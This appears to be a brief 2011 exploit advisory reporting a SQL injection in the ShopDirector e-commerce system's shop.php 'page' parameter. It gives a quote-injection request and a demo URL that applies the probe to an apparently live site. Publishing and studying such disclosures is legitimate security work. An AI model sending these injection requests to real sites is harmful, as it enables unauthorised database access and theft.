# Exploit Title: ShopDirector (E-Commerce System) SQL Injection # Date: 2011 # Author: Eyup CELIK # Software Link: http://www.polyspaston.com/content_shopdirector.php # Version: All Version # Tested on: All versions are Vulnerability ISSUE SQL Injection can be done using the command input Vulnerable Page: shop.php Example: shop.php?c1=Cake&c2=Test%20cake&page= Exploit: shop.php?c1=Cake&c2=Test%20cake&page='1 Demo: http://www.sd-demo.co.uk/shop/shop.php?c1=Cake&c2=Test%20cake&page='1 Thanks, Eyup CELIK Bilgi Teknolojileri Güvenlik Uzmani http://www.eyupcelik.com.tr